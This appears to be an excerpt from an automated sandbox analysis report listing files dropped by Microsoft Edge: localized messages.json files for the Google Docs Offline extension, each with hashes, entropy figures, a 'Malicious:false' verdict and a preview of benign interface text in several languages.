                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):994
Entropy (8bit):4.700308832360794
Encrypted:false
SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:A568A58817375590007D1B8ABCAEBF82
SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:false
Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2091
Entropy (8bit):4.358252286391144
Encrypted:false
SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:4717EFE4651F94EFF6ACB6653E868D1A
SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:false
Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2778
Entropy (8bit):3.595196082412897
Encrypted:false
SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:false
Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1719
Entropy (8bit):4.287702203591075
Encrypted:false
SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:3B98C4ED8874A160C3789FEAD5553CFA
SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:false
Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):936
Entropy (8bit):4.457879437756106
Encrypted:false
SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:7D273824B1E22426C033FF5D8D7162B7
SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:false
Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3830
Entropy (8bit):3.5483353063347587
Encrypted:false
SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:342335A22F1886B8BC92008597326B24
SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:false
Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1898
Entropy (8bit):4.187050294267571
Encrypted:false
SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:false
Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):914
Entropy (8bit):4.513485418448461
Encrypted:false
SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:32DF72F14BE59A9BC9777113A8B21DE6
SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:false
Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):851
Entropy (8bit):4.4858053753176526
Encrypted:false
SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:false
Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):878
Entropy (8bit):4.4541485835627475
Encrypted:false
SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
